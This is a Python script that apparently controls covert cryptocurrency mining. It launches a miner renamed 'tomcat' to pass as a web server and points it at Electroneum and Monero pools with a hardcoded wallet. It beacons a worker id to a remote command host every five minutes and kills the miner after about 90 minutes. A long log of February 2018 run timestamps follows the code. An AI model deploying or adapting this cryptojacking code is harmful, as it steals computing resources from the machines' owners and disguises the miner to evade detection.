import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:10:08.451318
#2018-02-17 16:56:05.900892
#2018-02-17 18:46:07.656675
#2018-02-17 20:33:06.775936
#2018-02-17 22:19:05.223969
#2018-02-18 00:03:05.259133
#2018-02-18 01:54:06.509583
#2018-02-18 03:42:05.266674
#2018-02-18 05:28:07.570577
#2018-02-18 07:20:08.423052
#2018-02-18 09:08:04.744100
#2018-02-18 10:54:03.675729
#2018-02-18 12:41:06.457393
#2018-02-18 14:28:03.668662
#2018-02-18 16:18:03.952768
#2018-02-18 18:07:05.114977
#2018-02-18 19:53:01.987545
#2018-02-18 21:40:03.800081
#2018-02-18 23:28:04.920948
#2018-02-19 01:15:06.845617
#2018-02-19 03:01:05.275714
#2018-02-19 04:47:06.046694
#2018-02-19 06:32:07.069953
#2018-02-19 08:21:05.241220
#2018-02-19 10:09:07.475381
#2018-02-19 11:58:07.409280
#2018-02-19 13:46:09.070430
#2018-02-19 15:36:02.206664
#2018-02-19 17:24:05.889414
#2018-02-19 19:12:08.357282
#2018-02-19 21:01:04.818982
#2018-02-19 22:48:01.721979
#2018-02-20 00:31:07.861601
#2018-02-20 02:19:01.701155
#2018-02-20 04:09:01.490593
#2018-02-20 05:52:07.153457
#2018-02-20 07:38:04.279020
#2018-02-20 09:22:05.746629
#2018-02-20 11:06:07.822935
#2018-02-20 12:52:09.228265
#2018-02-20 14:38:04.331549
#2018-02-20 16:23:08.577239
#2018-02-20 18:10:06.704448
#2018-02-20 20:03:03.878890
#2018-02-20 21:49:01.808604
#2018-02-20 23:32:05.138070
#2018-02-21 01:17:02.211050
#2018-02-21 03:04:05.455167
#2018-02-21 04:51:01.459649
#2018-02-21 06:41:03.953935
#2018-02-21 08:28:07.169143
#2018-02-21 10:16:04.904647
#2018-02-21 12:04:02.005069
#2018-02-21 13:52:03.692664
#2018-02-21 15:36:05.405569
#2018-02-21 17:26:07.298842
#2018-02-21 19:14:08.168244
#2018-02-21 21:02:05.929743
#2018-02-21 22:48:06.450531
#2018-02-22 00:38:05.041907
#2018-02-22 02:27:06.319482
#2018-02-22 04:15:09.644150
#2018-02-22 06:02:02.003017
#2018-02-22 07:47:07.447437
#2018-02-22 09:36:05.837986
#2018-02-22 11:21:07.852693
#2018-02-22 13:06:04.665210
#2018-02-22 14:53:07.932898
#2018-02-22 16:40:11.760539
#2018-02-22 18:26:05.869904
#2018-02-22 20:19:06.413282
#2018-02-22 22:06:05.300392
#2018-02-22 23:52:07.175985
#2018-02-23 01:41:07.524937
#2018-02-23 03:27:01.328630
#2018-02-23 05:13:01.943851
#2018-02-23 06:57:04.708314
#2018-02-23 08:48:05.519179
#2018-02-23 11:09:09.407205
#2018-02-23 13:04:08.397713
#2018-02-23 14:49:06.580540
#2018-02-23 16:38:02.151730
#2018-02-23 18:25:11.628070
#2018-02-23 20:11:03.908645
#2018-02-23 22:00:10.463040
#2018-02-23 23:48:07.083802
#2018-02-24 01:39:08.478116
#2018-02-24 03:29:04.281510
#2018-02-24 05:15:07.470283
#2018-02-24 07:03:03.974190
#2018-02-24 08:37:04.897332
#2018-02-24 10:08:04.901530
#2018-02-24 11:52:07.297558
#2018-02-24 13:19:07.800854
#2018-02-24 14:50:08.646624
#2018-02-24 16:22:06.542665
#2018-02-24 17:59:06.032730
#2018-02-24 19:26:06.491322
#2018-02-24 21:02:04.895481
#2018-02-24 23:04:06.190000
#2018-02-25 01:28:03.724765
#2018-02-25 05:17:01.736088
#2018-02-25 11:19:01.905432